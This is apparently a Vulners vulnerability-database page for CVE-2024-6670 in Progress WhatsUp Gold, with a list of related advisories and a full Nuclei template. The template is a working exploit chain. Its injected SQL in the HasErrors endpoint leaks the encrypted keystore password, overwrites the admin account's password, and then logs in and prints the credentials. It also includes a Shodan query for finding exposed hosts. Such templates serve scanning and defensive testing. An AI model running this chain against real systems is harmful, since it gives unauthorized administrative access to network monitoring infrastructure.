| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| CVE-2024-6670 | 29 Aug 202400:00 | – | attackerkb | |
| The vulnerability of the WhatsUp Gold network infrastructure monitoring system lies in the lack of protective measures for the SQL query structure, allowing attackers to gain unauthorized access to user data. | 16 Dec 202400:00 | – | bdu_fstec | |
| CVE-2024-6670 | 24 Aug 202409:50 | – | circl | |
| Progress WhatsUp Gold SQL Injection Vulnerability | 16 Sep 202400:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 16 Sep 202412:00 | – | cisa | |
| WhatsUp Gold 安全漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-6670 | 29 Aug 202422:04 | – | cve | |
| CVE-2024-6670 WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability | 29 Aug 202422:04 | – | cvelist | |
| Exploit for SQL Injection in Progress Whatsup_Gold | 30 Aug 202417:13 | – | githubexploit | |
| WhatsUp Gold SQL Injection (CVE-2024-6670) | 27 Sep 202418:53 | – | metasploit |
id: CVE-2024-6670
info:
name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
author: DhiyaneshDK,princechaddha
severity: critical
description: |
In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
impact: |
Unauthenticated attackers can exploit SQL injection to retrieve encrypted user passwords, modify admin credentials, and achieve authentication bypass for full system access.
remediation: |
Update WhatsUp Gold to version 2024.0.0 or later to address the SQL injection vulnerability.
reference:
- https://github.com/sinsinology/CVE-2024-6670
- https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
- https://www.progress.com/network-monitoring
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-6670
cwe-id: CWE-89
epss-score: 0.94661
epss-percentile: 0.99846
cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
product: whatsup_gold
vendor: progress
tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev,vkev,vuln
flow: |
http(1);
http(2);
http(3);
encryptedPassword = template.encryptedPassword
const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
const hexValues = cleanedInput.map(value => {
const num = parseInt(value);
return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
});
log(hexValues);
const hexString = hexValues.join('');
const varbinaryString = '0x' + hexString;
set("encryptedPassword", varbinaryString);
http(4) && http(5);
variables:
username: "admin"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'ASP.NET_SessionId=')
condition: and
internal: true
- raw:
- |
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
condition: and
internal: true
- raw:
- |
GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'DisplayName')
condition: and
internal: true
extractors:
- type: regex
internal: true
name: encryptedPassword
regex:
- '"psyduck\d+(,\d+)*"'
- raw:
- |
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'false')
condition: and
internal: true
- raw:
- |
POST /NmConsole/User/LoginAjax HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&rememberMe=false
matchers:
- type: word
part: body
words:
- '"authenticated":true'
- '"username":"'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# digest: 4a0a00473045022100bd1969c8d4b0f125dfe170628cce94781816d6d2c4731825351b2fbe85f493690220175ee4009f55440ecf6cfa5cbda2994c642c38ce048a2fa7f92e9ac9d937f4d6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation